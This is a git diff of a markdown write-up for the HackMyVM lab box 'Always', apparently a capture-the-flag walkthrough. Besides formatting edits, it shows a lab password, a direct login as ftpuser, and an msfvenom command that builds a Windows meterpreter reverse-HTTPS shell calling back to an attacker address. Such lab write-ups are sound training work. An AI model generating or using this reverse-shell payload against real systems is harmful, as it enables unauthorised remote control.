garffff-bot/garffff-bot.github.io/content/Hackmyvm/Easy/Always.md

 YouCantFindMe.!.!
 ```

 This password does not work on any service.
-Suspect it is a box issue
+Suspect it is a box issue.

-Login into the VM directly as the ftpuser works.
-Do get a shell, I used the following msfvenom:
+Login into the VM directly as the `ftpuser` works.
+Do get a shell, I used the following `msfvenom`:

 ```bash
 garffff@garffff:~/hackmyvm/always$ sudo msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.0.51 LPORT=443 -f exe > shell.exe